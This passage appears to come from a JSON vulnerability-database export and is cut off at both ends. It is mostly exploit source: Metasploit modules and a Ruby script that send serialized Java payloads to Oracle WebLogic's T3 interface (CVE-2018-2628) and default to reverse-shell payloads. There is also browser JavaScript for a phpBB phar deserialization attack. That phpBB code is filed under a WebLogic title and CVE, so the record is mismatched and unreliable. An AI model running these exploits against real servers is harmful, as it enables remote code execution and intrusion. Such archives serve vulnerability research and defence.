'416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\r\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\r\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\r\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\r\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\r\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\r\n payload << '1e030000787077'\r\n\r\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\r\n unicast_dat = '000a556e696361737452656600'\r\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\r\n unicast_dat << unicast_srvhost\r\n unicast_dat << '0000'\r\n unicast_dat << srvport.to_s(16).rjust(4,'0')\r\n unicast_dat << '000000004e18654b000000000000000000000000000000'\r\n unicast_dat << '78'\r\n\r\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\r\n payload << unicast_dat\r\n\r\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\r\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\r\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\r\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\r\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\r\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\r\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\r\n payload << '6f3b290000001b7878fe00ff'\r\n\r\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r\n data << payload\r\n\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.put([data].pack('H*'))\r\n sleep(1)\r\n sock.get_once\r\n end\r\n\r\n def exploit\r\n @met_sent = []\r\n gen_resp\r\n\r\n connect\r\n vprint_status('Sending handshake...')\r\n t3_handshake\r\n\r\n build_t3_request_object\r\n\r\n start_service\r\n\r\n vprint_status('Sending payload...')\r\n send_payload_objdata\r\n\r\n # Need to wait this long to make sure we get a shell back\r\n sleep(10)\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45193/"}, {"lastseen": "2019-03-07T22:40:03", "description": "", "published": "2019-01-03T00:00:00", "type": "exploitdb", "title": "Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-3245", "CVE-2018-2628"], "modified": "2019-01-03T00:00:00", "id": "EDB-ID:46513", "href": "https://www.exploit-db.com/exploits/46513", "sourceData": "// All greets goes to RIPS Tech\r\n// Run this JS on Attachment Settings ACP page\r\nvar plupload_salt = '';\r\nvar form_token = '';\r\nvar creation_time = '';\r\nvar filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip\r\n// your payload here\r\nvar payload = '<?php __HALT_COMPILER(); ?>\\x0d\\x0a\\xfe\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x00\\x00\\x01'+'\\x00'.repeat(5)+'\\xc8\\x01\\x00\\x00O:31:\"GuzzleHttp\\x5cCookie\\x5cFileCookieJar\":4:{s:41:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00filename\";s:30:\"/var/www/html/phpBB3/pinfo.php\";s:52:\"\\x00GuzzleHttp\\x5cCookie\\x5cFileCookieJar\\x00storeSessionCookies\";b:1;s:36:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00cookies\";a:1:{i:0;O:27:\"GuzzleHttp\\x5cCookie\\x5cSetCookie\":1:{s:33:\"\\x00GuzzleHttp\\x5cCookie\\x5cSetCookie\\x00data\";a:3:{s:7:\"Expires\";i:1;s:7:\"Discard\";b:0;s:5:\"Value\";s:17:\"<?php phpinfo();#\";}}}s:39:\"\\x00GuzzleHttp\\x5cCookie\\x5cCookieJar\\x00strictMode\";N;}\\x08\\x00\\x00\\x00test.txt\\x04\\x00\\x00\\x00K>\\x10\\x5c\\x04\\x00\\x00\\x00\\x0c~\\x7f\\xd8\\xb6\\x01'+'\\x00'.repeat(6)+'test\\xa0\\x17\\xd2\\xe0R\\xcf \\xf6T\\x1d\\x01X\\x91(\\x9dD]X\\x0b>\\x02\\x00\\x00\\x00GBMB';\r\nvar byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});\r\nvar sid = (new URL(document.location.href)).searchParams.get('sid');\r\nvar url = '/adm/index.php';\r\nvar getparams = {\r\n 'i': 'acp_database',\r\n 'sid': sid,\r\n 'mode': 'backup'\r\n};\r\n$.get(url, getparams, function(data) {\r\n form_token = $(data).find('[name=\"form_token\"]').val();\r\n creation_time = $(data).find('[name=\"creation_time\"]').val();\r\n if(form_token && creation_time) {\r\n var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';\r\n var postdata = {\r\n 'type': 'data',\r\n 'method': 'text',\r\n 'where': 'download',\r\n 'table[]': 'phpbb_config',\r\n 'submit': 'Submit',\r\n 'creation_time': creation_time,\r\n 'form_token': form_token\r\n }\r\n $.post(posturl.replace(\"|\", sid), postdata, function (data) {\r\n plupload_salt = data.match(/plupload_salt',\\s*'(\\w{32})/)[1];\r\n if (plupload_salt) {\r\n filepath = filepath.replace(\"$salt\", plupload_salt);\r\n var postdata = new FormData();\r\n postdata.append('name', 'evil.zip');\r\n postdata.append('chunk', 0);\r\n postdata.append('chunks', 2);\r\n postdata.append('add_file', 'Add the file');\r\n postdata.append('real_filename', 'evil.zip');\r\n // file\r\n var pharfile = new File([byteArray], 'evil.zip');\r\n postdata.append('fileupload', pharfile);\r\n jQuery.ajax({\r\n url: '/posting.php?mode=reply&f=2&t=1',\r\n data: postdata,\r\n cache: false,\r\n contentType: false,\r\n processData: false,\r\n method: 'POST',\r\n success: function(data){\r\n if (\"id\" in data) {\r\n $('#img_imagick').val(filepath).focus();\r\n $('html, body').animate({\r\n scrollTop: ($('#submit').offset().top)\r\n }, 500);\r\n }\r\n }\r\n });\r\n\r\n }\r\n }, 'text');\r\n }\r\n});", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46513"}], "metasploit": [{"lastseen": "2018-08-28T09:31:33", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.", "published": "2018-08-09T16:35:14", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2018-08-09T19:51:56", "id": "MSF:EXPLOIT/WINDOWS/MISC/WEBLOGIC_DESERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.\n },\n 'Author' =>\n [\n 'brianwrf', # EDB PoC\n 'Jacob Robles' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-2628'],\n ['EDB', '44553']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => ['win']\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'RPORT' => 7001\n },\n 'DisclosureDate' => 'Apr 17 2018'))\n end\n\n def gen_resp\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\n pwrshl.gsub!(\"%COMSPEC%\", \"cmd.exe\")\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\n\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\n mycmd << tmp_dat\n\n # Response data taken from JRMPListener generated data:\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\n # Modified captured network traffic bytes. Patch in command to run\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\n @resp << '70616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e7366'\n @resp << '6f726d65723b74001066696c653a2f746d702f73732e6a617278707372003a6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6675'\n @resp << '6e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97'\n @resp << '040200015b000d695472616e73666f726d65727374002d5b4c6f72672f617061'\n @resp << '6368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f72'\n @resp << '6d65723b74001066696c653a2f746d702f73732e6a617278707572002d5b4c6f'\n @resp << '72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472'\n @resp << '616e73666f726d65723bbd562af1d834189902000074001066696c653a2f746d'\n @resp << '702f73732e6a61727870000000057372003b6f72672e6170616368652e636f6d'\n @resp << '6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e737461'\n @resp << '6e745472616e73666f726d6572587690114102b1940200014c000969436f6e73'\n @resp << '74616e7471007e000174001066696c653a2f746d702f73732e6a617278707672'\n @resp << '00116a6176612e6c616e672e52756e74696d6500000000000000000000007078'\n @resp << '707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c65637469'\n @resp << '6f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287'\n @resp << 'e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e67'\n @resp << '2f4f626a6563743b4c000b694d6574686f644e616d6571007e00055b000b6950'\n @resp << '6172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7400'\n @resp << '1066696c653a2f746d702f73732e6a61727870757200135b4c6a6176612e6c61'\n @resp << '6e672e4f626a6563743b90ce589f1073296c0200007078700000000274000a67'\n @resp << '657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab'\n @resp << '16d7aecbcd5a99020000707870000000007400096765744d6574686f64757100'\n @resp << '7e003e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a'\n @resp << '3bb3420200007078707671007e003e7371007e00367571007e003b0000000270'\n @resp << '7571007e003b00000000740006696e766f6b657571007e003e00000002767200'\n @resp << '106a6176612e6c616e672e4f626a656374000000000000000000000070787076'\n @resp << '71007e003b7371007e0036757200135b4c6a6176612e6c616e672e537472696e'\n @resp << '673badd256e7e91d7b470200007078700000000174'\n\n @resp << mycmd\n\n @resp << '74'\n @resp << '0004657865637571007e003e0000000171007e00437371007e0031737200116a'\n @resp << '6176612e6c616e672e496e746567657212e2a0a4f78187380200014900057661'\n @resp << '6c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b'\n @resp << '02000070787000000001737200116a6176612e7574696c2e486173684d617005'\n @resp << '07dac1c31660d103000246000a6c6f6164466163746f72490009746872657368'\n @resp << '6f6c647078703f40000000000000770800000010000000007878767200126a61'\n @resp << '76612e6c616e672e4f7665727269646500000000000000000000007078707100'\n @resp << '7e005a'\n end\n\n\n def on_client_connect(client)\n # Make sure to only sent one meterpreter payload to a host.\n # During testing the remote host called back up to 11 times\n # (or as long as the server was listening).\n vprint_status(\"Comparing host: #{client.peerhost}\")\n if @met_sent.include?(client.peerhost) then return end\n @met_sent << client.peerhost\n\n vprint_status(\"met_sent: #{@met_sent}\")\n\n # Response format determined by watching network traffic\n # generated by EDB PoC\n accept_conn = '4e00'\n raccept_conn = client.peerhost.each_byte.map {|b| b.to_s(16)}.join\n accept_conn << (raccept_conn.length >> 1).to_s(16).rjust(2,'0')\n accept_conn << raccept_conn\n accept_conn << '0000'\n accept_conn << client.peerport.to_s(16).rjust(4,'0')\n\n client.put([accept_conn].pack('H*'))\n client.put([@resp].pack('H*'))\n end\n\n def t3_handshake\n shake = '74332031322e322e310a41533a323535'\n shake << '0a484c3a31390a4d533a313030303030'\n shake << '30300a0a'\n\n sock.put([shake].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def build_t3_request_object\n # data block is from EDB PoC\n data = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a'\n data << '56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278'\n data << '700000000a000000030000000000000006007070707070700000000a00000003'\n data << '0000000000000006007006fe010000aced00057372001d7765626c6f6769632e'\n data << '726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078'\n data << '707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e506163'\n data << '6b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d69'\n data << '6e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b'\n data << '5a000e74656d706f7261727950617463684c0009696d706c5469746c65740012'\n data << '4c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271'\n data << '007e00034c000b696d706c56657273696f6e71007e000378707702000078fe01'\n data << '0000aced00057372001d7765626c6f6769632e726a766d2e436c617373546162'\n data << '6c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e'\n data << '636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f9722455164'\n data << '52463e0200035b00087061636b616765737400275b4c7765626c6f6769632f63'\n data << '6f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e7265'\n data << '6c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e67'\n data << '3b5b001276657273696f6e496e666f417342797465737400025b427872002477'\n data << '65626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b61676549'\n data << '6e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a'\n data << '696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e'\n data << '000478707702000078fe010000aced00057372001d7765626c6f6769632e726a'\n data << '766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c0000787072'\n data << '00217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5065657249'\n data << '6e666f585474f39bc908f10200064900056d616a6f724900056d696e6f724900'\n data << '0c726f6c6c696e67506174636849000b736572766963655061636b5a000e7465'\n data << '6d706f7261727950617463685b00087061636b616765737400275b4c7765626c'\n data << '6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f'\n data << '3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5665'\n data << '7273696f6e496e666f972245516452463e0200035b00087061636b6167657371'\n data << '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c61'\n data << '6e672f537472696e673b5b001276657273696f6e496e666f4173427974657374'\n data << '00025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c'\n data << '2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f7249'\n data << '00056d696e6f7249000c726f6c6c696e67506174636849000b73657276696365'\n data << '5061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c'\n data << '6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56'\n data << '657273696f6e71007e000578707702000078fe00fffe010000aced0005737200'\n data << '137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078'\n data << '707750210000000000000000000d3139322e3136382e312e323237001257494e'\n data << '2d4147444d565155423154362e656883348cd6000000070000'\n\n data << rport.to_s(16).rjust(4, '0')\n\n data << 'ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced00'\n data << '05737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a'\n data << '0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461'\n data << '863d1d0000000078'\n\n sock.put([data].pack('H*'))\n sleep(2)\n sock.get_once\n end\n\n def send_payload_objdata\n # JRMPClient2 payload generated from EDB PoC:\n # python exploit.py <rhost> <rport> ysoserial-0.0.6-SNAPSHOT-BETA-all.jar <lhost> <lport> JRMPClient2\n # Patch in srvhost and srvport\n payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\n payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\n payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced'\n payload << '00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e'\n payload << '7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e0020000'\n payload << '78707702000078fe010000aced00057372001d7765626c6f6769632e726a766d'\n payload << '2e436c6173735461626c65456e7472792f52658157f4f9ed0c00007870720013'\n payload << '5b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870'\n payload << '7702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e43'\n payload << '6c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a61'\n payload << '76612e7574696c2e566563746f72d9977d5b803baf0103000349001163617061'\n payload << '63697479496e6372656d656e7449000c656c656d656e74436f756e745b000b65'\n payload << '6c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b'\n payload << '78707702000078fe010000'\n\n # Data\n payload << 'aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e'\n payload << '416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50'\n payload << '726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e67'\n payload << '2f7265666c6563742f496e766f636174696f6e48616e646c65723b7870737200'\n payload << '2d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e76'\n payload << '6f636174696f6e48616e646c657200000000000000020200007872001c6a6176'\n payload << '612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c6133'\n payload << '1e030000787077'\n\n unicast_srvhost = srvhost.each_byte.map { |b| b.to_s(16) }.join\n unicast_dat = '000a556e696361737452656600'\n unicast_dat << (unicast_srvhost.length >> 1).to_s(16).rjust(2,'0')\n unicast_dat << unicast_srvhost\n unicast_dat << '0000'\n unicast_dat << srvport.to_s(16).rjust(4,'0')\n unicast_dat << '000000004e18654b000000000000000000000000000000'\n unicast_dat << '78'\n\n payload << ((unicast_dat.length >> 1) - 1).to_s(16).rjust(2,'0')\n payload << unicast_dat\n\n payload << 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461'\n payload << '626c6553657276696365436f6e74657874ddcba8706386f0ba0c000078720029'\n payload << '7765626c6f6769632e726d692e70726f76696465722e42617369635365727669'\n payload << '6365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765'\n payload << '626c6f6769632e726d692e696e7465726e616c2e4d6574686f64446573637269'\n payload << '70746f7212485a828af7f67b0c000078707734002e61757468656e7469636174'\n payload << '65284c7765626c6f6769632e73656375726974792e61636c2e55736572496e66'\n payload << '6f3b290000001b7878fe00ff'\n\n data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\n data << payload\n\n sock.put([data].pack('H*'))\n sleep(1)\n sock.put([data].pack('H*'))\n sleep(1)\n sock.get_once\n end\n\n def exploit\n @met_sent = []\n gen_resp\n\n connect\n vprint_status('Sending handshake...')\n t3_handshake\n\n build_t3_request_object\n\n start_service\n\n vprint_status('Sending payload...')\n send_payload_objdata\n\n # Need to wait this long to make sure we get a shell back\n sleep(10)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/misc/weblogic_deserialize.rb"}, {"lastseen": "2020-10-07T18:51:43", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a serialized object to the interface to execute code on vulnerable hosts.\n", "published": "2018-08-28T17:38:54", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-2628"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.\n },\n 'Author' =>\n [\n 'brianwrf', # EDB PoC\n 'Jacob Robles' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2018-2628'],\n ['EDB', '44553']\n ],\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Unix',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},\n 'Payload' => {\n 'Encoder' => 'cmd/ifs',\n 'BadChars' => ' ',\n 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}\n }\n ],\n [ 'Windows',\n 'Platform' => 'win',\n 'Payload' => {},\n 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'RPORT' => 7001\n },\n 'DisclosureDate' => '2018-04-17'))\n end\n\n def check\n connect\n req = \"GET /console/login/LoginForm.jsp HTTP/1.1\\n\"\n req << \"Host: #{peer}\\n\\n\"\n sock.put(req)\n\n res = sock.get_once\n disconnect\n return CheckCode::Unknown unless res\n\n /WebLogic Server Version: (?<version>\\d+\\.\\d+\\.\\d+\\.*\\d*)/ =~ res\n if version\n version = Gem::Version.new(version)\n vprint_good(\"Detected Oracle WebLogic Server Version: #{version.to_s}\")\n\n case\n when version.to_s.start_with?('10.3')\n return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')\n when version.to_s.start_with?('12.1')\n return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')\n when version.to_s.start_with?('12.2')\n return CheckCode::Appears unless version > Gem::Version.new('12.2.1.3')\n end\n end\n\n if res.include?('Oracle WebLogic Server Administration Console')\n return CheckCode::Detected\n end\n\n CheckCode::Unknown\n end\n\n def gen_resp\n if target.name == 'Windows'\n pwrshl = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})\n tmp_dat = pwrshl.each_byte.map {|b| b.to_s(16)}.join\n else\n nix_cmd = payload.encoded\n nix_cmd.prepend('/bin/sh -c ')\n tmp_dat = nix_cmd.each_byte.map {|b| b.to_s(16)}.join\n end\n\n mycmd = (tmp_dat.length >> 1).to_s(16).rjust(4,'0')\n mycmd << tmp_dat\n\n # Response data taken from JRMPListener generated data:\n # java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener <lport> CommonsCollections1 'calc.exe'\n # Modified captured network traffic bytes. Patch in command to run\n @resp = '51aced0005770f02086f5ef3000001651a67984d80017372002e6a617661782e'\n @resp << '6d616e6167656d656e742e42616441747472696275746556616c756545787045'\n @resp << '7863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176'\n @resp << '612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863'\n @resp << '657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e'\n @resp << '5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c'\n @resp << '6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573'\n @resp << '736167657400124c6a6176612f6c616e672f537472696e673b5b000a73746163'\n @resp << '6b547261636574001e5b4c6a6176612f6c616e672f537461636b547261636545'\n @resp << '6c656d656e743b4c001473757070726573736564457863657074696f6e737400'\n @resp << '104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c'\n @resp << '6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c'\n @resp << '3cfd2239020000707870000000047372001b6a6176612e6c616e672e53746163'\n @resp << '6b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e'\n @resp << '756d6265724c000e6465636c6172696e67436c61737371007e00054c00086669'\n @resp << '6c654e616d6571007e00054c000a6d6574686f644e616d6571007e0005707870'\n @resp << '0000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c6973'\n @resp << '74656e65727400114a524d504c697374656e65722e6a617661740006646f4361'\n @resp << '6c6c7371007e000b000000e071007e000d71007e000e740009646f4d65737361'\n @resp << '67657371007e000b000000ab71007e000d71007e000e74000372756e7371007e'\n @resp << '000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e'\n @resp << '7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c6973'\n @resp << '74fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176'\n @resp << '612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c6543'\n @resp << '6f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a617661'\n @resp << '2f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e757469'\n @resp << '6c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870'\n @resp << '000000007704000000007871007e001b787372003273756e2e7265666c656374'\n @resp << '2e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e'\n @resp << '48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c7565'\n @resp << '7374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a61'\n @resp << '76612f6c616e672f436c6173733b707870737d00000001000d6a6176612e7574'\n @resp << '696c2e4d617074001066696c653a2f746d702f73732e6a6172787200176a6176'\n @resp << '612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c'\n @resp << '0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174'\n @resp << '696f6e48616e646c65723b7078707371007e001c7372002a6f72672e61706163'\n @resp << '68652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d'\n @resp << '61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61'\n @resp << 